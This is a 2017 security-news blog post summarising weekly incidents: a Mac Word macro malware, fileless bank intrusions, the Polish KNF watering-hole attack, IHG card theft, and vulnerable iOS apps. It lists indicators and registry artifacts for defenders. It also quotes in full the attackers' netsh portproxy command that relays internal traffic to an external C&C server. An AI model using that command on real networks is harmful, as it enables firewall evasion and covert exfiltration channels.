Saturday, February 11, 2017

Cyber Updates - 11/02

Hey all,
Here are this week's cyber updates:

(1) Microsoft Office allows its users to add a macro script to be executed when the document is opened. While this is usually used for formulas calculation, attackers have used it to execute malicious code on their victims' workstations, and in particular infecting them with ransomware (such as the Locky ransomware).
Today, the first Word macro for Mac OS was discovered. The malware downloads another file from https://www.securitychecking.org/index.asp and decrypts it (the file is encrypted using RC4 encryption). The malware then executes the decrypted file.

Organizations that use Mac OS systems are requested to check if any machines has queried the following malicious DNS record: www.securitychecking.org



(2) Numerous worldwide banks have been targeted by a malware stored only in the server's memory. Kaspersky reported to have their incident response team called due to a meterpeter code found in the memory of a bank's domain controller
What's interesting about this attack is the fact that the attackers have used the netsh.exe utility (builtin tool) in order to tunnel traffic from the victim's host to the attacker's C&C servers. In particular, the following command was used:

netsh interface portproxy add v4tov4 listenport=4444 connectaddress=<IP> connectport=8080 listenaddress=0.0.0.0

This caused the infected machine to listen on port 4444 and send this traffic to <IP> in port 8080. 
Thus, this has allowed a legitimate tool (netsh.exe) to be used in order to allow internal workstations and computers to communicate with an external C&C server, even if a direct communication channel between the internal machines and the internet is blocked by the organization's firewall.

Here are some artifacts generated in the Windows registry that will quickly allow an organization to determine if one of their machines was infected:


  • HKLM\SYSTEM\ControlSet001\services\ – path will be modified after using the sc.exe utility
  • HKLM\SYSTEM\ControlSet001\services\PortProxy\v4tov4\tcp – path will be modified after using the netsh.exe utility

(3) This has not been the best week (in terms of cyber security) for banks. Numerous Polish banks have been hacked, and the interesting part is that the source of the attack came from KNF - the Polish authority in charge of the safety and security of banks in Poland. Apparently, someone hacked KNF's website and has modified a JavaScript file to contain malicious data.

Clients are advised to block access to the following hosts:
  • sap.misapor.ch
  • www.eye-watch.in
  • 125.214.195.17
  • 196.29.166.218



(4) Last week I've mentioned the ransomware that targeted an hotel in Austria; this week it was IHG's turn to be infected by a malware. About 12 InterContinental point of sales machines have been hacked, allowing the attackers to gain credit cards data.

The following link lists all infected properties: https://www.ihg.com/content/us/en/customer-care/protecting-our-guests. Be sure to check if you've purchased anything there!


(5) 76 famous iOS application are vulnerable to MiTM attacks. Some are very popular, such as Snapchat. The app is vulnerable to MiTM attacks, allowing attackers to still your credentials (username and password).


Stay tuned for more updates,
Dan Gurfinkel
Head of Offensive Security & Response Unit